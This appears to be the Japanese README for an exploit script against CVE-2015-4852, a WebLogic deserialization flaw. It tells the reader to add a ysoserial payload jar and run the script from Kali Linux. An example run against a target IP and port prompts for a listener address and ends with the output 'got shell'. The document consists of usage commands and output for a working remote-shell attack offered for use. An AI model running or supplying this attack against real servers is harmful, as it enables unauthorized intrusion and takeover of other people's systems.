
CVE-2015-4852(WebLogic RCE)用のPythonエクスプロイトスクリプト。ysoserialペイロードを使用して、脆弱なWebLogicサーバー上でリモートシェルアクセスを実現します。
前提: ysoserial.jarをスクリプトディレクトリに配置してください(ysoserial-0*.jarをysoserial.jarにリネーム)。Kali Linuxでスクリプトを実行することを推奨します。
1.使い方:
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help このヘルプメッセージを表示して終了
-t TARGET, --target=TARGET ip port
2.例:
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
リスニングIPアドレスを入力してください:10.6.214.1
リスニングポートを入力してください:7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
実行成功
シェルを取得